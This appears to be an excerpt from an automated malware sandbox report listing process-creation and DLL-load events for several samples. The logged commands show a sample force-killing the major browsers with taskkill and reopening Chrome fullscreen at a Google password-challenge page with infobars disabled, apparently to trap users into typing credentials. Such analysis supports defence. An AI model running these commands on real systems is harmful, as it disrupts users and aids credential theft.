Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5612 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5172 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2456 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2456 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5364 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5528 --field-trial-handle=1964,i,16714315343876232385,13045965869128810005,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=2016,i,9763649198199615889,4058380472595766421,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=2004,i,8592830290365317448,7467397625344037838,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=2056,i,1132564284520540060,11615293102951086546,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
